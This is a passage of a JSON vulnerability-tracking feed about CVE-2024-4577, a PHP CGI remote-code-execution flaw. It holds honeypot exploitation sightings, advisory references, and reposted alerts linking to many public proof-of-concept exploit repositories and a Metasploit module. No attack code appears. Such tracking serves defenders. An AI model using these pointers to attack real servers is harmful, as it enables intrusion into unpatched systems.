"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-18)", "content": "", "creation_timestamp": "2025-11-18T00:00:00.000000Z"}, {"uuid": "b2433d55-3eea-487d-8b5c-379149d43ce3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-12)", "content": "", "creation_timestamp": "2025-10-12T00:00:00.000000Z"}, {"uuid": "59731a70-5b57-4791-844a-21dd6f60c5dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-26)", "content": "", "creation_timestamp": "2025-08-26T00:00:00.000000Z"}, {"uuid": "b770663f-e639-488e-85e8-a7c6c72594ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-27)", "content": "", "creation_timestamp": "2025-08-27T00:00:00.000000Z"}, {"uuid": "588654c3-d2ef-4fbb-8189-303e7fb1560d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:24.000000Z"}, {"uuid": "7d98a178-d289-4233-91d8-8dcf8728b4e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:10.000000Z"}, {"uuid": "7cd1b4f4-18e0-4499-8934-bd8cdad671c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/mayahustle.com/post/3lz7kbxo4bb2h", "content": "", "creation_timestamp": "2025-09-19T18:58:58.274513Z"}, {"uuid": "c679fb74-9662-44e6-b944-9777e455fd03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-26)", "content": "", "creation_timestamp": "2025-09-26T00:00:00.000000Z"}, {"uuid": "4b48b1b8-8edf-4d76-ac51-b371a59173c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-23)", "content": "", "creation_timestamp": "2025-11-23T00:00:00.000000Z"}, {"uuid": "1f37c9a2-0e6d-413c-8cd8-aa87cb794943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb", "content": "", "creation_timestamp": "2024-06-17T18:45:05.000000Z"}, {"uuid": "010605f6-5888-4cf6-9576-e4d449690a19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-24)", "content": "", "creation_timestamp": "2025-09-24T00:00:00.000000Z"}, {"uuid": "1974f55a-c7be-4385-8645-bedd58314f02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-05)", "content": "", "creation_timestamp": "2025-12-05T00:00:00.000000Z"}, {"uuid": "4cd21c9e-93e5-43d1-86ca-2166de12d2de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-06)", "content": "", "creation_timestamp": "2025-12-06T00:00:00.000000Z"}, {"uuid": "5cbc1e5c-2c95-43a4-8eb9-1d1cb39ca9aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-10)", "content": "", "creation_timestamp": "2025-12-10T00:00:00.000000Z"}, {"uuid": "a20012a0-c052-445f-949a-2964ce9292ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-11)", "content": "", "creation_timestamp": "2025-12-11T00:00:00.000000Z"}, {"uuid": "0207bcb4-fb74-4663-8486-a8a5ad8326a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-14)", "content": "", "creation_timestamp": "2025-12-14T00:00:00.000000Z"}, {"uuid": "2de511b4-3216-4d3f-9ba6-f07543043b6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-16)", "content": "", "creation_timestamp": "2025-12-16T00:00:00.000000Z"}, {"uuid": "0f155dcd-02d4-4381-b0b2-ab560d06d1cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-17)", "content": "", "creation_timestamp": "2025-12-17T00:00:00.000000Z"}, {"uuid": "a327f6dc-d659-4b89-bd2b-dfcd048044f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-20)", "content": "", "creation_timestamp": "2025-12-20T00:00:00.000000Z"}, {"uuid": "7f7a32c7-f714-44eb-b9a7-ef273957782c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-21)", "content": "", "creation_timestamp": "2025-12-21T00:00:00.000000Z"}, {"uuid": "ac1e5f58-1860-453e-ba78-4048b8ab33b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-23)", "content": "", "creation_timestamp": "2025-12-23T00:00:00.000000Z"}, {"uuid": "7695b338-4286-44d8-b896-785734431dc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-24)", "content": "", "creation_timestamp": "2025-12-24T00:00:00.000000Z"}, {"uuid": "9c4eebee-0c10-41c8-8259-6c89bd11ec15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-25)", "content": "", "creation_timestamp": "2025-12-25T00:00:00.000000Z"}, {"uuid": "584d7939-e742-43ca-abba-67e07f097491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-26)", "content": "", "creation_timestamp": "2025-12-26T00:00:00.000000Z"}, {"uuid": "0ec442fc-7c2b-460b-9f45-7e0e9cb47408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-27)", "content": "", "creation_timestamp": "2025-12-27T00:00:00.000000Z"}, {"uuid": "10fcebd5-4112-4145-b495-0d0ca4bbc996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-29)", "content": "", "creation_timestamp": "2025-12-29T00:00:00.000000Z"}, {"uuid": "440a4af6-7d77-4a6c-b787-78f14e0b228f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mbenzunflt2c", "content": "", "creation_timestamp": "2026-01-01T15:10:53.779083Z"}, {"uuid": "bc8744c0-6e66-483c-b202-f638d997f406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "234fed9b-71f4-4819-a4af-eedf1a2c099d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "18b0281f-c9c9-4a72-be49-306e3a19aaff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-09)", "content": "", "creation_timestamp": "2026-01-09T00:00:00.000000Z"}, {"uuid": "772748b1-0e45-4d2c-bf9e-85ceeae9cf08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-10)", "content": "", "creation_timestamp": "2026-03-10T00:00:00.000000Z"}, {"uuid": "9d157dc6-ce9c-4797-baa2-97e0d908d145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-19)", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "4e1e2c90-7cd4-4f5c-868d-a12079cbc223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "3ee03d35-b0be-4638-ab1d-e2798335f7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-45774", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "fa219556-48ab-4917-a4f9-4c7f3b81074b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-23)", "content": "", "creation_timestamp": "2026-03-23T00:00:00.000000Z"}, {"uuid": "a33bcecd-6961-4608-bd6f-4ef1e980b180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-45775", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "c7d33ec7-52d1-4caa-a858-b7311825df04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-45777", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "2d8735b2-20c8-4368-ae5c-218d64cf3448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-45776", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "b43e9dd1-85e8-4149-9fef-3a4d69ba1a88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-45778", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "56c25178-5e55-46ce-a8eb-deada3dc6695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-45779", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "c27227d0-0319-40a8-b76d-be1ad59e6c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/d29dbde5-754c-4ca2-8a8b-47f3b9e077f7", "content": "", "creation_timestamp": "2024-09-24T12:13:05.859516Z"}, {"uuid": "d96cbe5b-c441-4d16-926b-471eff726921", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1307", "content": "", "creation_timestamp": "2024-06-11T04:00:00.000000Z"}, {"uuid": "9cdc872f-c78d-4804-a637-309d28c75e0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-15)", "content": "", "creation_timestamp": "2026-03-15T00:00:00.000000Z"}, {"uuid": "7f3204fc-c101-47fc-b3bc-e09f6ba85f1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "3295817c-a6e2-4d8d-a90b-cd5f9f0ffe42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/60e22401-4121-4ad7-aa56-c1016ce371a8", "content": "", "creation_timestamp": "2026-02-02T12:26:35.137372Z"}, {"uuid": "d45995e0-b353-4f3d-95f4-58a869f302be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "72cbc529-a39a-4330-83e2-7916cf248f09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7605", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis is a PoC for PHP CVE-2024-4577.\nURL\uff1ahttps://github.com/bl4cksku11/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-11T15:17:03.000000Z"}, {"uuid": "7700d2e6-c164-446b-96ef-e74ff88da745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7616", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577\nURL\uff1ahttps://github.com/aaddmin1122345/CVE-2024-4577-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-12T04:59:11.000000Z"}, {"uuid": "37d2aff5-90aa-49ea-a877-7397166e8581", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7615", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577\nURL\uff1ahttps://github.com/aaddmin1122345/cve-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-12T04:55:02.000000Z"}, {"uuid": "f6ae7a7b-bd50-492c-9158-b58453702876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7614", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aphp-cgi RCE\u5feb\u901f\u68c0\u6d4b\nURL\uff1ahttps://github.com/nemu1k5ma/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-06-12T02:18:02.000000Z"}, {"uuid": "2bfafa5e-8a84-447a-90d2-25ac81177c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7690", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 POC\nURL\uff1ahttps://github.com/VictorShem/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-17T17:55:31.000000Z"}, {"uuid": "8d72ec04-c8c7-4b32-ac5c-44dc752daa6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7545", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.\nURL\uff1ahttps://github.com/TAM-K592/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T06:51:15.000000Z"}, {"uuid": "d40758a6-faf3-4397-8470-63d4e11a4d0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7544", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.\nURL\uff1ahttps://github.com/ATDanny/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T05:52:22.000000Z"}, {"uuid": "954fabb6-76b4-4f5b-8017-55b4962583c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7568", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aProof Of Concept RCE exploit for critical vulnerability in PHP <8.2.15 (Windows), allowing attackers to execute arbitrary commands.\nURL\uff1ahttps://github.com/manuelinfosec/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-06-08T05:54:39.000000Z"}, {"uuid": "7c3816c2-0d58-491f-9d47-80e092ad4f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7549", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577\nURL\uff1ahttps://github.com/ohhhh693/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T09:44:18.000000Z"}, {"uuid": "499e5618-4634-4d30-a725-77a9877e2c1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7548", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC\nURL\uff1ahttps://github.com/watchtowrlabs/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T09:30:08.000000Z"}, {"uuid": "dd85e6af-4c6e-4a9d-9bcb-a1f40fa236a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/CYiC6KAcAfm621pl2BFit5z4KE78wCCTVrL0xQPEoHOnJlw", "content": "", "creation_timestamp": "2025-12-30T21:00:05.000000Z"}, {"uuid": "cf4f8c45-743b-41d3-aeb5-8b796854ea3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7566", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 nuclei-templates\nURL\uff1ahttps://github.com/0x20c/CVE-2024-4577-nuclei\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-08T03:17:25.000000Z"}, {"uuid": "2e55cf23-ba52-44cd-af23-6f858eec3ca3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7553", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aNuclei Template for CVE-2024-4577\nURL\uff1ahttps://github.com/Sysc4ll3r/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T17:20:38.000000Z"}, {"uuid": "6d1a5976-d270-421f-8766-c2eaddf0a7fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7550", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aNuclei Template for CVE-2024-4577\nURL\uff1ahttps://github.com/11whoami99/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T10:01:54.000000Z"}, {"uuid": "29e1393b-46df-4f16-83ea-738980b45173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7574", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPoC for CVE-2024-4577 written in bash, go, python and a nuclei template\nURL\uff1ahttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-06-08T14:54:13.000000Z"}, {"uuid": "d036d89a-d9af-4d1b-9cf8-e5c7928f796e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7573", "content": 